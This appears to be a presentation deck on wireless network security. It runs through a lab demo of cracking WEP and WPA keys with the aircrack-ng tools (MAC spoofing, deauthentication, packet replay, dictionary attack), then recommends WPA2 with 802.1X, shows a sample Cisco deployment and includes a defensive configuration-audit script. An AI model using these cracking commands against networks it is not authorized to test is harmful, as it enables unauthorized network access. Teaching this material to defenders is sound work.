network security and ethical hacking
Network Security and Ethical Hacking - Wireless
Jason Maynard
CCDA, CCIP, CCNP, GSEC, GCFW
Infrastructure Architect
• Is it Secure?
It really depends on the methods used to secure it.
Encryption and Authentication Methods
WEP
Short for Wired Equivalent Privacy, a security protocol for wireless local area networks (WLANs) defined in the 802.11b standard.
WPA
Short for Wi-Fi Protected Access, a Wi-Fi standard that was designed to improve upon the security features of WEP.
WPA2
Short for Wi-Fi Protected Access 2, the follow-on security method to WPA for wireless networks. It provides stronger data protection and network access control and is based on the IEEE 802.11i standard.
MAC authentication is easy to sniff and spoof, and the SSID can still be obtained by sniffing the network.
Couple of demos
• WEP
• WPA
Items Needed
• USB key with Backtrack3 (Linux distro used for ethical hacking)
• DWA-642 PCMCIA card (Atheros chipset, uses the madwifi-ng driver)
• Access point running WEP and then WPA
• 2 client laptops running Linux and Windows connecting to the AP
Command Line Tools
• ifconfig
• iwconfig
• macchanger
• airmon-ng
• airodump-ng
• aireplay-ng
• aircrack-ng
Open a couple of terminals
– Type “iwconfig” to identify the cards
– Type “ifconfig” to determine which cards are up
– Type “airmon-ng stop wifi0” and “airmon-ng stop ath0” to ensure the cards are not running in monitor mode
– Type “ifconfig ath0 down” and “ifconfig wifi0 down” to ensure the interface is down
– Type “macchanger --mac 00:11:22:33:44:55 wifi0” (changes the MAC address)
– Type “airmon-ng start wifi0” (puts the card in monitor mode)
– Type “airodump ath0” to find an AP that is running WEP or WPA, then copy the SSID and stop the scan
WEP Cracking
– Type “airodump -w wep.cap -c “channel #” --bssid “SSID in HEX” ath0” (this captures packets sent to the AP)
– New terminal
– Type “aireplay-ng -1 0 -a “SSID” -h “MAC in HEX” ath0” (this fakes authentication)
– Go to another terminal
– Type “aireplay-ng -2 -p 0841 -b “SSID” -h “MAC in HEX” ath0” (interactive packet replay)
– Go to another terminal
– Type “aircrack-ng wep*.cap”
WPA Cracking
– Type “airodump -w wpa.cap -c “channel #” --bssid “SSID in HEX” ath0” (this captures packets sent to the AP)
– Type “aireplay-ng -0 5 -a “SSID” ath0” (deauthentication)
– Type “aircrack-ng -0 -x2 wpa*.cap -w /pentest/wireless/aircrack-ng/test/password.lst”
So what do I do to protect my network and wireless users?
Use WPA2 with 802.1x
WPA2 provides government grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm and 802.1x-based authentication
802.1X provides port-based authentication, which involves communications between a supplicant, authenticator, and authentication server.
802.1X – The most secure methods
• EAP – PEAP
• EAP – TLS
EAP – PEAP
• Uses server certificates and MSCHAPv2
EAP – TLS
• One of the most secure methods; uses client and server certificates. More difficult to manage.
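An added example (not from the original slides): a small Python audit of wpa_supplicant-style network blocks against the recommendation above, flagging WEP, WPA fallback, missing 802.1X, and PEAP/TLS profiles that do not validate the server certificate. The sample configuration, SSIDs and file paths are constructed for illustration.

```python
import re

# Constructed sample in wpa_supplicant.conf syntax (not taken from the slides).
SAMPLE_CONF = '''
network={
    ssid="lab-wep"
    key_mgmt=NONE
    wep_key0="abcde"
}
network={
    ssid="corp-peap"
    key_mgmt=WPA-EAP
    proto=WPA RSN
    eap=PEAP
    phase2="auth=MSCHAPV2"
}
network={
    ssid="corp-tls"
    key_mgmt=WPA-EAP
    proto=RSN
    eap=TLS
    ca_cert="/etc/ssl/corp-ca.pem"
    client_cert="/etc/ssl/user.pem"
}
'''

def parse_networks(text):
    """Return one {key: value} dict per network={...} block."""
    blocks = re.findall(r"network=\{(.*?)\}", text, re.S)
    return [{k: v.strip('"') for k, v in re.findall(r"^\s*(\w+)=(.*)$", b, re.M)}
            for b in blocks]

def audit(net):
    """List the ways a network block falls short of WPA2 with 802.1X."""
    findings = []
    key_mgmt = net.get("key_mgmt", "").split()
    if "NONE" in key_mgmt and any(k.startswith("wep_key") for k in net):
        findings.append("WEP in use")
    if "WPA-EAP" not in key_mgmt:
        return findings + ["no 802.1X authentication"]
    if net.get("proto", "").split() != ["RSN"]:
        findings.append("WPA allowed; restrict proto to RSN (WPA2)")
    if "ca_cert" not in net:  # without ca_cert the server certificate is not verified
        findings.append("server certificate is not validated")
    if net.get("eap") == "TLS" and "client_cert" not in net:
        findings.append("EAP-TLS without a client certificate")
    return findings

def audit_all(text=SAMPLE_CONF):
    return {n["ssid"]: audit(n) for n in parse_networks(text)}
```

An empty list for a profile means it matches the WPA2 with 802.1X recommendation as far as these checks go.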
Wireless LAN Solution
[Diagram: Cisco 4500; Cisco WLC 4400; Novell Netware 6.5 SP5; Windows 2003 Ent Server running ACS 4.0; HP laptop using 802.1x (EAP-PEAP) with WPA2]
Cisco LWAPP gets its configuration from the WLC using LWAPP protocol.
1. Users enter their Novell credentials to log on to the wireless network.
2. Cisco WLC forwards the user's credentials to the ACS server.
3. Cisco ACS forwards the credentials to the Netware 6.5 SP5 server, or the Windows 2003 Ent Server running ACS 4.0 will have eDirectory installed locally, making it more secure.
4. Novell checks its directory services for the user account and validates the user's credentials.
5. The user is granted access to the WLAN.
[Diagram labels: SSL LDAP; Cisco Aironet 1200 wireless access point; Cisco 4400 Series Wireless LAN Controller, model 4402; Catalyst 4000 series switch with WS-X4548-GB-RJ45V 48-port 10/100/1000 BASE-T in-line power modules; Catalyst 3560 Series PoE-48]
Remote Sites (Mississauga): Cisco 1242 LWAPP using HREAP to do local switching; HP laptop using 802.1x (EAP-PEAP) with WPA2.
Supporting Products:
• FreeRadius and OpenSSL
• Microsoft Radius and Group Policy, Certificate Services
• Cisco ACS server and Local Authentication/AD/NDS
Support Products Links:
Backtrack
• http://www.remote-exploit.org/backtrack_download.html
FreeRadius and OpenSSL
• http://wiki.freeradius.org
• http://www.openssl.org
Cisco ACS
• http://www.cisco.com/en/US/products/sw/secursw/ps2086
Microsoft
• http://www.microsoft.com/technet/security/prodtech/windowsserver2003/pkiwire/swlan.mspx?mfr=true
• http://technet.microsoft.com/en-us/magazine/cc162468.aspx
Questions?